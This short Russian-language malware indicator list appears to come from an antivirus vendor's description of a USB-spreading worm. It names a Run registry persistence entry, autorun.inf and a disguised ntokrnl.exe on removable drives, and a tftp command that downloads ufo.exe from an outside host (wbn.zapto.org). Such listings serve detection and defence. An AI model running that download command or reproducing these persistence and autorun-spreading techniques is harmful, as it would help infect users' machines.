Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'UserInit' = '<SYSTEM32>\userint.exe'
- <Имя диска съемного носителя>:\autorun.inf
- <Имя диска съемного носителя>:\ntokrnl.exe
- <SYSTEM32>\tftp.exe -i wbn.zapto.org get ufo.exe C:\sysdump.exe
- <SYSTEM32>\userint.exe
- <Имя диска съемного носителя>:\autorun.inf
- <Имя диска съемного носителя>:\ntokrnl.exe
- DNS ASK wb#.#apto.org
- 'wb#.#apto.org':69